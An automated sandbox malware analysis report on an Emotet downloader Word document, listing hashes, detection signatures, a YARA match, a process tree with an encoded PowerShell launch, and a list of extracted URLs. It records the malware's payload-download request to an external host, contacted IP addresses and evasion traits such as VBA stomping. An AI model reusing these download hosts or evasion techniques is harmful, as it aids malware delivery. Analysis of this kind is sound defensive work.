Analysis Report SecuriteInfo.com.Exploit.Siggen2.12176.26135.29106

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen2.12176.26135.29106 (renamed file extension from 29106 to doc)
Analysis ID: 255722
MD5: 3158d249b1df418410378fb0a8acc3d3
SHA1: 0b1a3f8ee1317f9001eaf098a8de861859d5ceac
SHA256: 774c827f086962222073ad050dfa5b10e8cc0411731e506edc4a0363f4a2815d

Detection

Emotet
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet Downloader
Creates HTML files with .exe extension (expired dropper behavior)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
PowerShell case anomaly found
Very long command line found
Allocates a big amount of memory (probably used for heap spraying)
Contains long sleeps (>= 3 min)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 5204 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6192 cmdline: powersheLL -e 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\Documents\20200802\PowerShell_transcript.813435.MH5mPmJJ.20200802003123.txt
Rule: PowerShell_Case_Anomaly
Description: Detects obfuscated PowerShell hacktools
Author: Florian Roth
Strings:
  • 0x23:$s1: PowerShell
  • 0xff:$s1: powersheLL
  • 0xfa0:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xfa0:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xfa0:$sn3: PowerShell
  • 0x101:$a1: wersheLL -e

Source: C:\Users\user\Documents\20200802\PowerShell_transcript.813435.MH5mPmJJ.20200802003123.txt
Rule: JoeSecurity_EmotetDownloader
Description: Yara detected Emotet Downloader
Author: Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: winword.exe | Memory has grown: Private usage: 0MB later: 64MB
Source: global traffic | DNS query: name: www.hatchdogs.com
Source: global traffic | TCP traffic: 192.168.2.5:49742 -> 149.255.60.149:443
Source: global traffic | TCP traffic: 192.168.2.5:49741 -> 143.95.43.98:80

Networking:

Creates HTML files with .exe extension (expired dropper behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: 744.exe.1.dr
Source: global traffic | HTTP traffic detected: GET /assets/XIw/ HTTP/1.1; Host: www.hatchdogs.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1; Host: www.hatchdogs.com
Source: unknown | DNS traffic detected: queries for: www.hatchdogs.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://officeapps.live.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://onedrive.live.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 744.exe.1.drString found in binary or memory: https://schema.org
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://settings.outlook.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 744.exe.1.drString found in binary or memory: https://stats.wp.com/e-202031.js
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://tasks.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 744.exe.1.drString found in binary or memory: https://themegrill.com/themes/colormag
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 744.exe.1.drString found in binary or memory: https://wordpress.org
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 744.exe.1.drString found in binary or memory: https://www.exactmetrics.com/
    Source: 744.exe.1.drString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: 744.exe.1.drString found in binary or memory: https://www.google.com/recaptcha/api.js?onload=cf7srLoadCallback&render=explicit
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/#organization
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/1-medium-mobile/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/65623583_1777682085698087_543777356850921472_n/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/?page_id=2266
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/booking/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/comments/feed/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/faqs-2/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/feed/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/logo-master/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/my-booking/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/11-2/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/9-2/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/attachment/10632/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/awards/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/fun/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/photo-booth-hire/glitter/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/pricing/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/privacy-policy/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/reviews/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/t-cs/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/the-booth/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-admin/admin-ajax.php
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/css/framework/cf7s-default.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/css/framework/cf7s-normalize.c
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7-skins/skins/styles/vanilla/vanilla.c
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7/includes/css/styles.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/cookie-notice/css/front.min.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/cookie-notice/js/front.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/rating-display.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/rating-form.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/css/slider-controls-simp
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/controller.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/actual/jquery-act
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/form-validation/f
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/strongslider/jque
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/validate/jquery-v
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/public/js/lib/verge/verge.min.j
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/templates/default-form/form.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/strong-testimonials/templates/default/content.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/ultimate-faqs/css/ewd-ufaq-styles.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/ultimate-faqs/css/rrssb-min.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/plugins/youtube-embed/css/main.min.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/fontawesome/css/font-awesome.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/colormag-custom.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/fitvids/jquery.fitvids.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/html5shiv.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/jquery.bxslider.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/magnific-popup/jquery.magnific-popup.min
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/magnific-popup/magnific-popup.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/navigation.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/skip-link-focus-fix.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/js/sticky/jquery.sticky.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/themes/colormag/style.css
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-content/uploads/2019/10/cropped-boo12345.jpg
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/js/dist/vendor/wp-polyfill-url.min.js
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-includes/wlwmanifest.xml
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.groovyboove.co.uk%2F
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.groovyboove.co.uk%2F&#0
    Source: 744.exe.1.drString found in binary or memory: https://www.groovyboove.co.uk/xmlrpc.php?rsd
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: 744.exe.1.drString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443

    E-Banking Fraud:

    Malicious encrypted Powershell command line found
    Source: unknown  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e 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